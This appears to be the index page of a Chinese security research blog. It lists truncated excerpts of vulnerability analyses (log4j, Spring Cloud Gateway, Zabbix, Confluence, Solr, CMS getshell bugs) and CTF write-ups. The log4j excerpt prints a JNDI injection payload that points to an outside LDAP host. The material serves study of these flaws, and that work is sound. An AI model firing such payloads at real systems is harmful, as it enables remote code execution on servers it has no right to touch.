phpok 前台写shell
刚刚看了suanve师傅发的phpok https://susec.me/2022/03/13/phpok6-0-%E5%89%8D%E5%8F%B0%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9Egetshell/ 废话不多说直接看login_control控制器 接收fid、fcode…
spring-cloud-gateway_spel_CVE-2022-22947
1.ssrf https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ 2.spel https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ 影响版本: 3.1.0 3.0.0 to 3.…
zabbix_CVE-2022-23131_saml-sso鉴权绕过
CVE-2022-23131 环境搭建: zabbix5.4的虚拟机: https://cdn.zabbix.com/zabbix/appliances/stable/5.4/5.4.8/zabbix_appliance-5.4.8-vmx.tar.gz 配置saml sso登录: https://www.bookstack.cn/read/zab…
记一次失败的CVE-2021-44548分析
CVE-2021-44548 之前在zsxq看到有师傅发solr的洞,今天看了一下,但是好像危害不大,不过还是学习为主看一波 https://solr.apache.org/security.html#cve-2021-44548-apache-solr-information-disclosure-vulnerability-through-da…
log4j rce
log4j rce 影响版本: 2.0-beta9 到 2.14.1 修复版本: 2.15.0-rc2 payload: ${jndi:ldap://9zx4xu.dnslog.cn:1389/Exp} 分析: 先来看原来没修的 2.14.1 import org.apache.logging.log4j.LogManager; import or…
Confluence 漏洞分析
CVE-2019-3396 https://jira.atlassian.com/browse/CONFSERVER-57974 影响版本为: version < 6.6.12 6.7.0 <= version < 6.12.3 6.13.0 <= version < 6.13.3 6.14.0 <= versi…
讯睿cms前台getshell
目录结构,index.php包含Fcms\init.php做入口,核心controller代码在dayrui中 路由为?s=控制器文件夹&c=具体控制器&m=方法,如?s=member&c=login&s=index 直接到漏洞函数,首先通过get传入app name module参数 这里进入294行的else中,…
ciscn2021两道java题目
ciscn2021 华北半决赛 java 注册后登录,/message会显示所有的message,而浏览方式是通过/view,然后传path参数,存在任意文件读取 tree中给了目录树 . ├── pom.xml └── src └── main ├── java │ └── com │ └── nothing │ └── game │ ├── G…
GKCTF2021
easycms 网上找了个后台getshell的cms哪来改改用了,当作签到题。 ​ babycat 非预期: 首先是uploadServlet中doPost没权限校验导致guest也能直接传文件,其次在check函数后转发没返回,后面的代码依旧执行,造成了严重的非预期呜呜呜 if (checkExt(ext) || checkContent(it…
java写文件getshell
如果能任意文件读写,除了写jsp、crontab,如何getshell 写class 使用fastjson 1.2.68 先看一下原理: 使用期望类expectClass 如: public class testfj1268 extends Exception { private String domain; public testfj1268()…